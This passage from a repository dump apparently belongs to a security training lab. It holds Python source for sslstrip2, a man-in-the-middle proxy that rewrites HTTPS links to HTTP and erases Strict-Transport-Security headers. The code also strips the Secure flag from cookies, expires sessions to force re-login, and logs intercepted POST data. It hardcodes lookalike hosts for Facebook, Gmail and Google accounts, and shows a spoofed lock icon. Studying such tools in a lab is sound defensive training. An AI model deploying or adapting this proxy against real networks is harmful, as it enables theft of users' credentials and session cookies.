re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 35 | urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 36 | urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) 37 | urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) 38 | # urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) 39 | 40 | def __init__(self, command, uri, postData, headers, client): 41 | self.command = command 42 | self.uri = uri 43 | self.postData = postData 44 | self.headers = headers 45 | self.client = client 46 | self.urlMonitor = URLMonitor.getInstance() 47 | self.isImageRequest = False 48 | self.isCompressed = False 49 | self.contentLength = None 50 | self.shutdownComplete = False 51 | 52 | def getLogLevel(self): 53 | return logging.DEBUG 54 | 55 | def getPostPrefix(self): 56 | return "POST" 57 | 58 | def sendRequest(self): 59 | logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) 60 | self.sendCommand(self.command, self.uri) 61 | 62 | def sendHeaders(self): 63 | for header, value in self.headers.items(): 64 | logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) 65 | self.sendHeader(header, value) 66 | 67 | self.endHeaders() 68 | 69 | def sendPostData(self): 70 | logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) 71 | self.transport.write(self.postData) 72 | 73 | def connectionMade(self): 74 | logging.log(self.getLogLevel(), "HTTP connection made.") 75 | self.sendRequest() 76 | self.sendHeaders() 77 | 78 | if (self.command == 'POST'): 79 | self.sendPostData() 80 | 81 | def handleStatus(self, version, code, message): 82 | logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) 83 | self.client.setResponseCode(int(code), message) 84 | 85 | def handleHeader(self, key, value): 86 | logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) 87 | 88 | if (key.lower() == 'location'): 89 | value = self.replaceSecureLinks(value) 90 | 91 | if (key.lower() == 'content-type'): 92 | if (value.find('image') != -1): 93 | self.isImageRequest = True 94 | logging.debug("Response is image content, not scanning...") 95 | 96 | if (key.lower() == 'content-encoding'): 97 | if (value.find('gzip') != -1): 98 | logging.debug("Response is compressed...") 99 | self.isCompressed = True 100 | elif (key.lower() == 'content-length'): 101 | self.contentLength = value 102 | elif (key.lower() == 'set-cookie'): 103 | self.client.responseHeaders.addRawHeader(key, value) 104 | elif (key.lower()== 'strict-transport-security'): 105 | logging.log(self.getLogLevel(), "LEO Erasing Strict Transport Security....") 106 | else: 107 | self.client.setHeader(key, value) 108 | 109 | 110 | def handleEndHeaders(self): 111 | if (self.isImageRequest and self.contentLength != None): 112 | self.client.setHeader("Content-Length", self.contentLength) 113 | 114 | if self.length == 0: 115 | self.shutdown() 116 | 117 | def handleResponsePart(self, data): 118 | if (self.isImageRequest): 119 | self.client.write(data) 120 | else: 121 | HTTPClient.handleResponsePart(self, data) 122 | 123 | def handleResponseEnd(self): 124 | if (self.isImageRequest): 125 | self.shutdown() 126 | else: 127 | HTTPClient.handleResponseEnd(self) 128 | 129 | def handleResponse(self, data): 130 | if (self.isCompressed): 131 | logging.debug("Decompressing content...") 132 | data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() 133 | 134 | logging.log(self.getLogLevel(), "Read from server:\n" + data) 135 | #logging.log(self.getLogLevel(), "Read from server:\n " ) 136 | 137 | 138 | data = self.replaceSecureLinks(data) 139 | 140 | if (self.contentLength != None): 141 | self.client.setHeader('Content-Length', len(data)) 142 | 143 | self.client.write(data) 144 | self.shutdown() 145 | 146 | def replaceSecureLinks(self, data): 147 | sustitucion = {} 148 | patchDict = self.urlMonitor.patchDict 149 | if len(patchDict)>0: 150 | dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) 151 | data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data) 152 | 153 | iterator = re.finditer(ServerConnection.urlExpression, data) 154 | for match in iterator: 155 | url = match.group() 156 | 157 | logging.debug("Found secure reference: " + url) 158 | nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) 159 | logging.debug("LEO replacing %s => %s"%(url,nuevaurl)) 160 | sustitucion[url] = nuevaurl 161 | #data.replace(url,nuevaurl) 162 | 163 | #data = self.urlMonitor.DataReemplazo(data) 164 | if len(sustitucion)>0: 165 | dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys()))) 166 | data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) 167 | 168 | #logging.debug("LEO DEBUG received data:\n"+data) 169 | #data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data) 170 | #data = re.sub(ServerConnection.urlTypewww, 'http://w', data) 171 | #if data.find("http://w.face")!=-1: 172 | # logging.debug("LEO DEBUG Found error in modifications") 173 | # raw_input("Press Enter to continue") 174 | #return re.sub(ServerConnection.urlType, 'http://web.', data) 175 | return data 176 | 177 | 178 | def shutdown(self): 179 | if not self.shutdownComplete: 180 | self.shutdownComplete = True 181 | self.client.finish() 182 | self.transport.loseConnection() 183 | 184 | 185 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/ServerConnectionFactory.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | from twisted.internet.protocol import ClientFactory 21 | 22 | class ServerConnectionFactory(ClientFactory): 23 | 24 | def __init__(self, command, uri, postData, headers, client): 25 | self.command = command 26 | self.uri = uri 27 | self.postData = postData 28 | self.headers = headers 29 | self.client = client 30 | 31 | def buildProtocol(self, addr): 32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) 33 | 34 | def clientConnectionFailed(self, connector, reason): 35 | logging.debug("Server connection failed.") 36 | 37 | destination = connector.getDestination() 38 | 39 | if (destination.port != 443): 40 | logging.debug("Retrying via SSL") 41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) 42 | else: 43 | self.client.finish() 44 | 45 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/StrippingProxy.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | from twisted.web.http import HTTPChannel 20 | from ClientRequest import ClientRequest 21 | 22 | class StrippingProxy(HTTPChannel): 23 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things. 24 | This is the basic proxy server class, where we get callbacks for GET and POST methods. 25 | We then proxy these out using HTTP or HTTPS depending on what information we have about 26 | the (connection, client_address) tuple in our cache. 27 | ''' 28 | 29 | requestFactory = ClientRequest 30 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/URLMonitor.py: -------------------------------------------------------------------------------- 1 | # URLMonitor 2 | 3 | import re 4 | import logging 5 | 6 | class URLMonitor: 7 | 8 | ''' 9 | The URL monitor maintains a set of (client, url) tuples that correspond to requests which the 10 | server is expecting over SSL. It also keeps track of secure favicon urls. 11 | ''' 12 | 13 | # Start the arms race, and end up here... 14 | javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] 15 | _instance = None 16 | sustitucion = {} # LEO: diccionario host / sustitucion 17 | real = {} # LEO: diccionario host / real 18 | patchDict = { 19 | 'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net', 20 | 'https:\/\/www.facebook.com':'http:\/\/social.facebook.com', 21 | 'return"https:"':'return"http:"' 22 | } 23 | 24 | def __init__(self): 25 | self.strippedURLs = set() 26 | self.strippedURLPorts = {} 27 | self.faviconReplacement = False 28 | 29 | self.sustitucion["mail.google.com"] = "gmail.google.com" 30 | self.real["gmail.google.com"] = "mail.google.com" 31 | 32 | self.sustitucion["www.facebook.com"] = "social.facebook.com" 33 | self.real["social.facebook.com"] = "www.facebook.com" 34 | 35 | self.sustitucion["accounts.google.com"] = "cuentas.google.com" 36 | self.real["cuentas.google.com"] = "accounts.google.com" 37 | 38 | self.sustitucion["accounts.google.es"] = "cuentas.google.es" 39 | self.real["cuentas.google.es"] = "accounts.google.es" 40 | 41 | def isSecureLink(self, client, url): 42 | for expression in URLMonitor.javascriptTrickery: 43 | if (re.match(expression, url)): 44 | return True 45 | 46 | return (client,url) in self.strippedURLs 47 | 48 | def getSecurePort(self, client, url): 49 | if (client,url) in self.strippedURLs: 50 | return self.strippedURLPorts[(client,url)] 51 | else: 52 | return 443 53 | 54 | def addSecureLink(self, client, url): 55 | methodIndex = url.find("//") + 2 56 | method = url[0:methodIndex] 57 | pathIndex = url.find("/", methodIndex) 58 | host = url[methodIndex:pathIndex].lower() 59 | path = url[pathIndex:] 60 | 61 | port = 443 62 | portIndex = host.find(":") 63 | 64 | if (portIndex != -1): 65 | host = host[0:portIndex] 66 | port = host[portIndex+1:] 67 | if len(port) == 0: 68 | port = 443 69 | 70 | #LEO: Sustituir HOST 71 | if not self.sustitucion.has_key(host): 72 | lhost = host[:4] 73 | if lhost=="www.": 74 | self.sustitucion[host] = "w"+host 75 | self.real["w"+host] = host 76 | else: 77 | self.sustitucion[host] = "web"+host 78 | self.real["web"+host] = host 79 | logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) 80 | 81 | url = 'http://' + host + path 82 | #logging.debug("LEO stripped URL: %s %s"%(client, url)) 83 | 84 | self.strippedURLs.add((client, url)) 85 | self.strippedURLPorts[(client, url)] = int(port) 86 | return 'http://'+self.sustitucion[host]+path 87 | 88 | def setFaviconSpoofing(self, faviconSpoofing): 89 | self.faviconSpoofing = faviconSpoofing 90 | 91 | def isFaviconSpoofing(self): 92 | return self.faviconSpoofing 93 | 94 | def isSecureFavicon(self, client, url): 95 | return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) 96 | 97 | def URLgetRealHost(self,host): 98 | logging.debug("Parsing host: %s"%host) 99 | if self.real.has_key(host): 100 | logging.debug("New host: %s"%self.real[host]) 101 | return self.real[host] 102 | else: 103 | logging.debug("New host: %s"%host) 104 | return host 105 | 106 | def getInstance(): 107 | if URLMonitor._instance == None: 108 | URLMonitor._instance = URLMonitor() 109 | 110 | return URLMonitor._instance 111 | 112 | getInstance = staticmethod(getInstance) 113 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/__init__.py -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | class ClientRequest(Request): 38 | 39 | ''' This class represents incoming client requests and is essentially where 40 | the magic begins. Here we remove the client headers we dont like, and then 41 | respond with either favicon spoofing, session denial, or proxy through HTTP 42 | or SSL to the server. 43 | ''' 44 | 45 | def __init__(self, channel, queued, reactor=reactor): 46 | Request.__init__(self, channel, queued) 47 | self.reactor = reactor 48 | self.urlMonitor = URLMonitor.getInstance() 49 | self.cookieCleaner = CookieCleaner.getInstance() 50 | self.dnsCache = DnsCache.getInstance() 51 | # self.uniqueId = random.randint(0, 10000) 52 | 53 | def cleanHeaders(self): 54 | headers = self.getAllHeaders().copy() 55 | 56 | if 'accept-encoding' in headers: 57 | del headers['accept-encoding'] 58 | 59 | if 'if-modified-since' in headers: 60 | del headers['if-modified-since'] 61 | 62 | if 'cache-control' in headers: 63 | del headers['cache-control'] 64 | 65 | return headers 66 | 67 | def getPathFromUri(self): 68 | if (self.uri.find("http://") == 0): 69 | index = self.uri.find('/', 7) 70 | return self.uri[index:] 71 | 72 | return self.uri 73 | 74 | def getPathToLockIcon(self): 75 | if os.path.exists("lock.ico"): return "lock.ico" 76 | 77 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 78 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 79 | 80 | if os.path.exists(scriptPath): return scriptPath 81 | 82 | logging.warning("Error: Could not find lock.ico") 83 | return "lock.ico" 84 | 85 | def handleHostResolvedSuccess(self, address): 86 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address)) 87 | lhost = self.getHeader("host").lower() 88 | host = self.urlMonitor.URLgetRealHost(lhost) 89 | headers = self.cleanHeaders() 90 | client = self.getClientIP() 91 | path = self.getPathFromUri() 92 | 93 | self.content.seek(0,0) 94 | postData = self.content.read() 95 | url = 'http://' + host + path 96 | 97 | self.dnsCache.cacheResolution(host, address) 98 | 99 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 100 | logging.debug("Sending expired cookies...") 101 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 102 | host, headers, path)) 103 | elif (self.urlMonitor.isSecureFavicon(client, path)): 104 | logging.debug("Sending spoofed favicon response...") 105 | self.sendSpoofedFaviconResponse() 106 | elif (self.urlMonitor.isSecureLink(client, url)): 107 | logging.debug("Sending request via SSL...") 108 | self.proxyViaSSL(address, self.method, path, postData, headers, 109 | self.urlMonitor.getSecurePort(client, url)) 110 | else: 111 | logging.debug("Sending request via HTTP...") 112 | self.proxyViaHTTP(address, self.method, path, postData, headers) 113 | 114 | def handleHostResolvedError(self, error): 115 | logging.warning("Host resolution error: " + str(error)) 116 | self.finish() 117 | 118 | def resolveHost(self, host): 119 | address = self.dnsCache.getCachedAddress(host) 120 | 121 | if address != None: 122 | logging.debug("Host cached.") 123 | return defer.succeed(address) 124 | else: 125 | logging.debug("Host not cached.") 126 | return reactor.resolve(host) 127 | 128 | def process(self): 129 | logging.debug("Resolving host: %s" % (self.getHeader('host'))) 130 | host = self.getHeader('host') 131 | deferred = self.resolveHost(host) 132 | 133 | deferred.addCallback(self.handleHostResolvedSuccess) 134 | deferred.addErrback(self.handleHostResolvedError) 135 | 136 | def proxyViaHTTP(self, host, method, path, postData, headers): 137 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 138 | connectionFactory.protocol = ServerConnection 139 | self.reactor.connectTCP(host, 80, connectionFactory) 140 | 141 | def proxyViaSSL(self, host, method, path, postData, headers, port): 142 | clientContextFactory = ssl.ClientContextFactory() 143 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 144 | connectionFactory.protocol = SSLServerConnection 145 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 146 | 147 | def sendExpiredCookies(self, host, path, expireHeaders): 148 | self.setResponseCode(302, "Moved") 149 | self.setHeader("Connection", "close") 150 | self.setHeader("Location", "http://" + host + path) 151 | 152 | for header in expireHeaders: 153 | self.setHeader("Set-Cookie", header) 154 | 155 | self.finish() 156 | 157 | def sendSpoofedFaviconResponse(self): 158 | icoFile = open(self.getPathToLockIcon()) 159 | 160 | self.setResponseCode(200, "OK") 161 | self.setHeader("Content-type", "image/x-icon") 162 | self.write(icoFile.read()) 163 | 164 | icoFile.close() 165 | self.finish() 166 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 49 | 50 | ServerConnection.handleHeader(self, key, value) 51 | 52 | def stripFileFromPath(self, path): 53 | (strippedPath, lastSlash, file) = path.rpartition('/') 54 | return strippedPath 55 | 56 | def buildAbsoluteLink(self, link): 57 | absoluteLink = "" 58 | 59 | if ((not link.startswith('http')) and (not link.startswith('/'))): 60 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 61 | 62 | logging.debug("Found path-relative link in secure transmission: " + link) 63 | logging.debug("New Absolute path-relative link: " + absoluteLink) 64 | elif not link.startswith('http'): 65 | absoluteLink = "http://"+self.headers['host']+link 66 | 67 | logging.debug("Found relative link in secure transmission: " + link) 68 | logging.debug("New Absolute link: " + absoluteLink) 69 | 70 | if not absoluteLink == "": 71 | absoluteLink = absoluteLink.replace('&', '&') 72 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 73 | 74 | def replaceCssLinks(self, data): 75 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 76 | 77 | for match in iterator: 78 | self.buildAbsoluteLink(match.group(1)) 79 | 80 | return data 81 | 82 | def replaceFavicon(self, data): 83 | match = re.search(SSLServerConnection.iconExpression, data) 84 | 85 | if (match != None): 86 | data = re.sub(SSLServerConnection.iconExpression, 87 | "", data) 88 | else: 89 | data = re.sub(SSLServerConnection.headExpression, 90 | "", data) 91 | 92 | return data 93 | 94 | def replaceSecureLinks(self, data): 95 | data = ServerConnection.replaceSecureLinks(self, data) 96 | data = self.replaceCssLinks(data) 97 | 98 | if (self.urlMonitor.isFaviconSpoofing()): 99 | data = self.replaceFavicon(data) 100 | 101 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 102 | 103 | for match in iterator: 104 | self.buildAbsoluteLink(match.group(10)) 105 | 106 | return data 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string, random, zlib, gzip, StringIO 20 | 21 | from twisted.web.http import HTTPClient 22 | from URLMonitor import URLMonitor 23 | 24 | class ServerConnection(HTTPClient): 25 | 26 | ''' The server connection is where we do the bulk of the stripping. Everything that 27 | comes back is examined. The headers we dont like are removed, and the links are stripped 28 | from HTTPS to HTTP. 29 | ''' 30 | 31 | urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) 32 | urlType = re.compile(r"https://", re.IGNORECASE) 33 | urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 34 | urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) 35 | urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) 36 | # urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) 37 | 38 | def __init__(self, command, uri, postData, headers, client): 39 | self.command = command 40 | self.uri = uri 41 | self.postData = postData 42 | self.headers = headers 43 | self.client = client 44 | self.urlMonitor = URLMonitor.getInstance() 45 | self.isImageRequest = False 46 | self.isCompressed = False 47 | self.contentLength = None 48 | self.shutdownComplete = False 49 | 50 | def getLogLevel(self): 51 | return logging.DEBUG 52 | 53 | def getPostPrefix(self): 54 | return "POST" 55 | 56 | def sendRequest(self): 57 | logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) 58 | self.sendCommand(self.command, self.uri) 59 | 60 | def sendHeaders(self): 61 | for header, value in self.headers.items(): 62 | logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) 63 | self.sendHeader(header, value) 64 | 65 | self.endHeaders() 66 | 67 | def sendPostData(self): 68 | logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) 69 | self.transport.write(self.postData) 70 | 71 | def connectionMade(self): 72 | logging.log(self.getLogLevel(), "HTTP connection made.") 73 | self.sendRequest() 74 | self.sendHeaders() 75 | 76 | if (self.command == 'POST'): 77 | self.sendPostData() 78 | 79 | def handleStatus(self, version, code, message): 80 | logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) 81 | self.client.setResponseCode(int(code), message) 82 | 83 | def handleHeader(self, key, value): 84 | logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) 85 | 86 | if (key.lower() == 'location'): 87 | value = self.replaceSecureLinks(value) 88 | 89 | if (key.lower() == 'content-type'): 90 | if (value.find('image') != -1): 91 | self.isImageRequest = True 92 | logging.debug("Response is image content, not scanning...") 93 | 94 | if (key.lower() == 'content-encoding'): 95 | if (value.find('gzip') != -1): 96 | logging.debug("Response is compressed...") 97 | self.isCompressed = True 98 | elif (key.lower() == 'content-length'): 99 | self.contentLength = value 100 | elif 